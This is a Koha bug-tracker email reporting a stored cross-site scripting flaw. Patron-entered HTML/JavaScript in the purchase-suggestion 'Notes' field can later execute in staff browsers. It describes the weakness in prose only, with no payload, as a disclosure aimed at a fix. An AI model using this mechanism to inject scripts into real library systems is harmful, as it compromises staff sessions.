[Koha-bugs] [Bug 11322] New: Suggestion "notes" field should be sanitized or escaped
bugzilla-daemon at bugs.koha-community.org
bugzilla-daemon at bugs.koha-community.org
Fri Nov 29 18:39:18 CET 2013
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11322
Bug ID: 11322
Summary: Suggestion "notes" field should be sanitized or
escaped
Change sponsored?: ---
Product: Koha
Version: master
Hardware: All
OS: All
Status: NEW
Severity: major
Priority: P5 - low
Component: Acquisitions
Assignee: koha-bugs at lists.koha-community.org
Reporter: abl at biblos.pk.edu.pl
QA Contact: testopia at bugs.koha-community.org
It's possible for patron to make purchase suggestion from OPAC with
html/javascript code within Notes: field. Such injected JS code will be stored
in the database, and in certain circumstances (when managing suggestions in
acquisition) it may got subsequently executed in staff WWW browser.
Other suggestion fields may be affected as well, but the problem with 'notes'
is potentially more severe because it's a long field - more elaborate "evil"
script will fit into it.
--
You are receiving this mail because:
You are the assignee for the bug.
You are watching all bug changes.
More information about the Koha-bugs
mailing list